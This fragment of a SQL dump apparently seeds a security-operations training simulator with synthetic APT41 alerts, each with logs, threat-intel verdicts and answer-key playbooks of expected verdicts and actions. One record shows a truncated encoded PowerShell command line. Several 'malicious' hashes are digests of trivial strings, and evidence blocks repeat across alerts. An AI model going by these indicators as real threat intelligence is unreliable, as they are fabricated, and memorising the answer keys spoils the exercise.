1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1497, 'Suspicious Network Activity Detected', 'high', 'Network Traffic Analysis', 'Unusual outbound connections from ASUS servers have been flagged, indicating potential compromise. APT41 might be attempting to infiltrate the ASUS update server to distribute malicious payloads.', 'Initial Access', 'T1195 - Supply Chain Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"url\":\"https://update.asus.com/firmware\",\"filename\":\"ASUS_update_v1.0.exe\",\"md5_hash\":\"3b2a9f2e9b8c1c6d9e4f2b7a2b5a4d1f\",\"user_agent\":\"ASUSUpdate/2.0\",\"user_account\":\"asus_admin\",\"event_type\":\"network_connection\",\"description\":\"An ASUS server at 192.168.1.15 is making unusual outbound connections to IP 203.0.113.45 using protocol HTTPS.\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of ASUS server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://update.asus.com/firmware\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Potentially compromised ASUS update server.\"}},{\"id\":\"artifact_4\",\"type\":\"md5_hash\",\"value\":\"3b2a9f2e9b8c1c6d9e4f2b7a2b5a4d1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious payload used by 
APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1498, 'Malicious Code Execution Identified', 'high', 'Endpoint Detection and Response (EDR)', 'An update package from ASUS software updates was found to contain malicious code. This code executes upon installation, deploying a backdoor that allows further exploitation of the system.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-09-25T14:32:49Z\",\"event_id\":\"EDR-456789\",\"event_type\":\"code_execution\",\"source_ip\":\"203.0.113.15\",\"internal_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"process_name\":\"ASUSUpdater.exe\",\"file_name\":\"ASUSUpdate_v3.14.exe\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"detected_behavior\":\"Supply Chain Attack\",\"threat_actor\":\"APT41\",\"associated_tactics\":[\"Supply Chain Attacks\",\"Espionage\"],\"malicious_code\":true}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT41 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as containing malicious code associated with APT41\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ASUSUpdate_v3.14.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Executable file used to execute APT41 malicious 
payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1499, 'Persistence Mechanisms Discovered', 'high', 'System Logs', 'The attackers have embedded persistence mechanisms within the affected systems, allowing for ongoing access.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:12Z\",\"event_id\":\"4624\",\"source_ip\":\"185.199.108.153\",\"internal_ip\":\"192.168.1.45\",\"username\":\"compromised_user\",\"filename\":\"taskhostw.exe\",\"hash\":\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"action\":\"Registry value added\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized access\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"taskhostw.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with persistence mechanisms\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash related to APT41 
malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1500, 'Lateral Movement Detected', 'high', 'Internal Network Monitoring', 'APT41 is attempting to expand access within the network by targeting specific MAC addresses. Compromised systems are being used to move laterally.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:55:36Z\",\"event\":\"Lateral Movement Attempt\",\"source_ip\":\"10.0.1.15\",\"target_ip\":\"10.0.1.20\",\"attacker_ip\":\"203.0.113.45\",\"compromised_user\":\"j.doe\",\"malware_hash\":\"7a82f1c3b2d5e4a6f9c8d4f9e3b2a4c5\",\"target_mac_address\":\"00:1A:2B:3C:4D:5E\",\"filename\":\"CCleaner_v2.0.exe\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Source IP of lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 attacker IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7a82f1c3b2d5e4a6f9c8d4f9e3b2a4c5\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 CCleaner variant\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"CCleaner_v2.0.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1501, 'Targeted Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Tools', 'An attempt was detected to exfiltrate sensitive data from devices with specific MAC addresses. This marks the final step of the operation by APT41, using their known tactics and tools.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_id\":\"DLP-EXF-2345\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.25\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"HTTPS\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"mac_address\":\"00:1B:44:11:3A:B7\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"action\":\"blocked\",\"description\":\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive data attempted to be 
exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external 
IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1502, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting government officials with the intent to deliver a malicious payload for initial access.', 'Phishing', 'T1566', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T08:32:21Z\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"security-update@fakedomain.com\",\"recipient_email\":\"john.doe@govagency.gov\",\"sender_ip\":\"203.0.113.45\",\"attachment_filename\":\"Account_Update.docm\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"malicious_url\":\"http://malicious-update.com/login\",\"internal_ip\":\"192.168.1.15\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"security-update@fakedomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"Email domain used in multiple phishing attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known malware used for credential theft\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing URL targeting government sectors\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.150Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
